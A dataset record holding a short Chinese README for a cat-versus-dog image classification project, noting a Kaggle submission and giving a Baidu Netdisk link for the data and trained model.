"content_id": "7f327b1ff2fbf23628d7e5a31217e800dbb408e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 263,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 11,
"path": "/README.md",
"repo_name": "CYYukio/cat-dog",
"src_encoding": "UTF-8",
"text": "# cat-dog\n猫狗分类\n\n2021-02-04\n完成模型预测,csv提交到kaggle\n\n链接:https://pan.baidu.com/s/1sk0nCV872HhA2Z4O11jjAQ \n提取码:y96f \n复制这段内容后打开百度网盘手机App,操作更方便哦\n\n数据以及网络模型上传至网盘\n"
}
] | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.